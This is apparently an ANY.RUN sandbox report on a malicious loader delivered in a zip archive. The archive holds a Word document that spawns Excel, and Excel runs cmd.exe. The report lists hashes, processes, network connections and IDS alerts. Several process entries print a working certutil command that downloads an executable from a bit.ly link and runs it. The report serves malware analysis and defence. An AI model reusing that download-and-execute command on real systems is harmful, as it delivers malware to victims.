analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Sample1.zip

Full analysis: https://app.any.run/tasks/c064e909-26e5-4e86-b80f-22b695d4a057
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 11, 2019, 20:55:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

E3831FCA25FA28FBC9DA88A7FD484D90

SHA1:

5A349AB5B05194165913C78C0D176324D3D813FE

SHA256:

C50D8732743A8287FAAAB989600000FCDEF7673DB5132B60FBEB6E317492BAF2

SSDEEP:

6144:kL/HDKQJj9UoG6ykUlGJiv/TdU27sKvCm:+/H9K3kFJS5ngQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3444)
      • EXCEL.EXE (PID: 3488)
      • EXCEL.EXE (PID: 3152)
      • EXCEL.EXE (PID: 3048)
      • EXCEL.EXE (PID: 2208)
      • EXCEL.EXE (PID: 3532)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3444)
      • EXCEL.EXE (PID: 3152)
      • EXCEL.EXE (PID: 3488)
      • EXCEL.EXE (PID: 3048)
      • EXCEL.EXE (PID: 2208)
      • EXCEL.EXE (PID: 3532)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 2524)
      • cmd.exe (PID: 1632)
      • cmd.exe (PID: 3568)
      • cmd.exe (PID: 3120)
      • cmd.exe (PID: 1472)
      • cmd.exe (PID: 4012)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 3488)
      • EXCEL.EXE (PID: 3444)
      • EXCEL.EXE (PID: 3152)
      • EXCEL.EXE (PID: 3048)
      • EXCEL.EXE (PID: 2208)
      • EXCEL.EXE (PID: 3532)
      • excelcnv.exe (PID: 3576)
    • Creates files in the user directory

      • certutil.exe (PID: 3016)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3620)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3444)
      • WINWORD.EXE (PID: 3620)
      • EXCEL.EXE (PID: 3152)
      • EXCEL.EXE (PID: 3488)
      • EXCEL.EXE (PID: 3048)
      • EXCEL.EXE (PID: 2208)
      • excelcnv.exe (PID: 3576)
      • EXCEL.EXE (PID: 3532)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3620)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 94913c130238189b03b1f8565c20cd62777e5c25f5d2b62a73a9a2bc9192b353.bin
ZipUncompressedSize: 1033790
ZipCompressedSize: 208673
ZipCRC: 0xf4485988
ZipModifyDate: 2019:07:11 20:51:22
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 788
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
63
Monitored processes
21
Malicious processes
12
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs cmd.exe no specs certutil.exe excelcnv.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3084"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sample1.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3620"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ayyy.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3444"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2524cmd.exe /ccertutil -urlcache -split -f http://bit.ly/2jDHbGF 0989434.exe& 0989434.exeC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3016certutil -urlcache -split -f http://bit.ly/2jDHbGF 0989434.exeC:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954557
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3488"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
1632cmd.exe /ccertutil -urlcache -split -f http://bit.ly/2jDHbGF 0989434.exe& 0989434.exeC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2764certutil -urlcache -split -f http://bit.ly/2jDHbGF 0989434.exeC:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954557
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3152"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3568cmd.exe /ccertutil -urlcache -split -f http://bit.ly/2jDHbGF 0989434.exe& 0989434.exeC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
3 294
Read events
2 512
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
3
Unknown types
6

Dropped files

PID
Process
Filename
Type
3084WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3084.6325\94913c130238189b03b1f8565c20cd62777e5c25f5d2b62a73a9a2bc9192b353.bin
MD5:
SHA256:
3620WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9637.tmp.cvr
MD5:
SHA256:
3444EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR9F7E.tmp.cvr
MD5:
SHA256:
3488EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA4CD.tmp.cvr
MD5:
SHA256:
3152EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA77D.tmp.cvr
MD5:
SHA256:
3048EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRAA2C.tmp.cvr
MD5:
SHA256:
2208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRAD39.tmp.cvr
MD5:
SHA256:
3532EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRB141.tmp.cvr
MD5:
SHA256:
3576excelcnv.exeC:\Users\admin\AppData\Local\Temp\CVRB577.tmp.cvr
MD5:
SHA256:
3576excelcnv.exeC:\Users\admin\AppData\Local\Temp\~DFB6A5A23ADD12CA77.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
47
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2764
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
3660
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
2764
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
3016
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
888
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
1952
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
3660
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
3296
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
888
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
3296
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2jDHbGF
US
html
136 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3016
certutil.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
2764
certutil.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
888
certutil.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
52.237.22.139:443
ec2-3-83-64-249.azurewebsites.net
Microsoft Corporation
CA
unknown
3016
certutil.exe
52.237.22.139:443
ec2-3-83-64-249.azurewebsites.net
Microsoft Corporation
CA
unknown
2764
certutil.exe
52.237.22.139:443
ec2-3-83-64-249.azurewebsites.net
Microsoft Corporation
CA
unknown
888
certutil.exe
52.237.22.139:443
ec2-3-83-64-249.azurewebsites.net
Microsoft Corporation
CA
unknown
3660
certutil.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
3660
certutil.exe
52.237.22.139:443
ec2-3-83-64-249.azurewebsites.net
Microsoft Corporation
CA
unknown
1952
certutil.exe
52.237.22.139:443
ec2-3-83-64-249.azurewebsites.net
Microsoft Corporation
CA
unknown

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
ec2-3-83-64-249.azurewebsites.net
  • 52.237.22.139
unknown

Threats

PID
Process
Class
Message
3016
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
2764
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
888
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3660
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3296
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
1952
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
6 ETPRO signatures available at the full report
No debug info